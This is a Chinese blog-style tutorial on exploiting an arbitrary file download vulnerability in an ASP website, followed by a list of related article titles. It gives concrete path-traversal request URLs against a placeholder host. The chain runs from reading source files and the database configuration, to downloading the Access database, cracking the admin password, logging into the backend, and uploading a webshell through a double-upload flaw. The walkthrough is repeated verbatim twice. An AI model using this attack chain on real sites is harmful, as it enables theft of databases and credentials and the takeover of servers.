任意文件下载漏洞 asp站点
2016-07-31 10:46
591 查看
一般的asp站点都是access数据库(连接sql server 直接可以参考aspx站点的利用方法)。而access数据库可以直接下载,因此利用该漏洞比较简便的方法就是直接下载access数据库,找到管理员密码登陆后台,利用后台的上传功能,上传shell.
一个asp下载点
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=012%C5%A9%B2%FA%C6%B7%BC%D3%B9%A4%CB%F9.doc
确定站点根目录:
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../GraduateSchool/dlsd/download.asp
下一个步,找到网站与数据库操作的动态页面,动态页面中一般使用include包含连接数据库的配置文件。
找到后台登陆入口
http://www.testcn/jianshen/F89A1/ Admin_login.asp
下载该登陆界面:
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../ jianshen/F89A1/ Admin_login.asp
打开下载后文件:
可以确定数据库连接文件在inc/conn.asp中
下载该文件
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../ jianshen/F89A1/ inc/conn.asp
打开该文件
可以看到数据库路径。
http://www.testcn/jianshen/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb
直接下载失败。应该是做了限制。使用下载点下载
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../jianshen/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb
打开数据库,获得管理员用户名和密码(密码md5加密)
弱口令,破解获得密码,登录后台
找到上传位置
下载该文件,里面使用通用的上传文件,存在二次上传,构造二次上传页面:
选择两个文件上传,即可获得webshell.
一个asp下载点
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=012%C5%A9%B2%FA%C6%B7%BC%D3%B9%A4%CB%F9.doc
确定站点根目录:
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../GraduateSchool/dlsd/download.asp
下一个步,找到网站与数据库操作的动态页面,动态页面中一般使用include包含连接数据库的配置文件。
找到后台登陆入口
http://www.testcn/jianshen/F89A1/ Admin_login.asp
下载该登陆界面:
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../ jianshen/F89A1/ Admin_login.asp
打开下载后文件:
可以确定数据库连接文件在inc/conn.asp中
下载该文件
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../ jianshen/F89A1/ inc/conn.asp
打开该文件
可以看到数据库路径。
http://www.testcn/jianshen/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb
直接下载失败。应该是做了限制。使用下载点下载
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../jianshen/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb
打开数据库,获得管理员用户名和密码(密码md5加密)
弱口令,破解获得密码,登录后台
找到上传位置
下载该文件,里面使用通用的上传文件,存在二次上传,构造二次上传页面:
选择两个文件上传,即可获得webshell.
相关文章推荐
- 任意文件下载漏洞 php站点
- 任意文件下载漏洞 aspx站点
- 任意文件下载漏洞 jsp站点
- 『原创』PHP168 0DAY 任意文件下载漏洞利用工具
- 【转】ASP.NET惊爆新安全漏洞 攻击者可访问任意文件
- ASP代码审计学习笔记 -5.文件下载漏洞
- ASP.NET 惊爆新安全漏洞 攻击者可访问任意文件
- 新云网站管理系统任意文件可下载漏洞
- 中国电信某站点JBOSS任意文件上传漏洞
- ASP.NET 惊爆新安全漏洞 攻击者可访问任意文件
- 网站url过滤不严格造成下载任意文件漏洞
- phpcms的phpcms_auth导致的任意变量覆盖漏洞、本地文件包含漏洞和任意文件下载漏洞
- web安全(7)-- 任意文件下载漏洞
- 百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码
- ASP.NET惊爆新安全漏洞 攻击者可访问任意文件
- 科讯Kesion Cms7.0 任意文件下载漏洞
- asp.net从服务器(指定文件夹)下载任意格式的文件到本地
- WordPress wp-FileManager插件‘path’参数任意文件下载漏洞
- 任意文件下载漏洞学习
- TEC-004-php文件下载任意文件读取漏洞修复